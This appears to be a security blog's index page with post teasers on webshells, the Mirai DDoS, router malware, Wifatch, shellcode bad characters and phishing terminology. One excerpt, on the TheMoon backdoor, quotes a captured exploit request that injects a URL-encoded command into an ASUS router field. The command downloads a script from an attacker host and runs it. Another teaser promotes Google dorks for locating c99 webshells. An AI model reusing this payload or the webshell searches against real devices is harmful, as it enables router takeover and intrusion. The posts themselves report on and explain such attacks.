Do we need an Internet Policing Force with all power? I can still download malware from a site that was published weeks ago…

Most of the readers here know that I am not a fan of over-policing, abuse of power, etc. However, the internet isn’t under any one jurisdiction (although most people think the USA is that). There are a lot more sites out there now than ever scanning and posting malicious sites … Read more

Every Google Dork Webshell C99shell Saudi Shell Huge List Of Searches

powered by captain crunch security team safe-mode: off (not secure) home basel 2.2 safe-mode: off (not secure) drwxrwxrwx c99memoryl c99shell [file on secure ok ] c99shell v. 1.0 pre-release build #16 hacker uid=99(nobody) gid=99(nobody) groups=99(nobody) –[ c99shell v. 1.0 pre-release build #16 basel c99shell v. 1.0 pre-release build powered by captain crunch security team | … Read more

Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT)? In today’s technological expansion everything seems to be connected to the Internet. For instance, in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, Xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected … Read more

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux backdoor found in the wild on one of our honeypots. This bot belongs to the TheMoon family of malware. The vulnerable ASUS router will download and execute the binary file .nttpd from the attacker-controlled website. POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host:\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ … Read more

What is the IEEE? What Standards are Bluetooth, Wireless, Cable, Fiber

IEEE is an acronym for the Institute of Electrical and Electronics Engineers. Its members are scientists and students who together are a leading authority in aerospace, telecommunications, biomedical engineering, electric power, etc. The IEEE consists of more than 365,000 members from around the world. The IEEE was formed in 1963 by … Read more

REINCARNA Linux.Wifatch Malware Whitehat Backdoor made by the good guys? How illegal is this?

So last night I did a little banner grabbing from some IP ranges that have been historically extremely insecure. I’m not a blackhat hacker anymore, so my intentions weren’t to exploit these hopeless, incompetent victims, but I would have notified them. I have considered the idea of compromising them just to patch them and save … Read more

Writing Shellcode for Buffer Overflows – Avoiding Bad Characters

Depending on the application, vulnerability type, and protocols in use, there may be certain characters that are considered “bad” and should not be used in your buffer, return address, or shellcode. One example of a common bad character (especially in buffer overflows caused by unchecked string copy operations) is the null byte (0x00). This character is considered bad because … Read more

Similarities and Differences in the terms Phishing, Malvertising, Spam and Malware E-mails

What is phishing? What are malvertising, spam e-mail and malware e-mail campaigns? These terms have started to become intertwined and used interchangeably, which generally means that there is a lack of understanding in the IT community, which is typical. Over time, laziness and improper training have a way of bending security definitions into bundles. A great example … Read more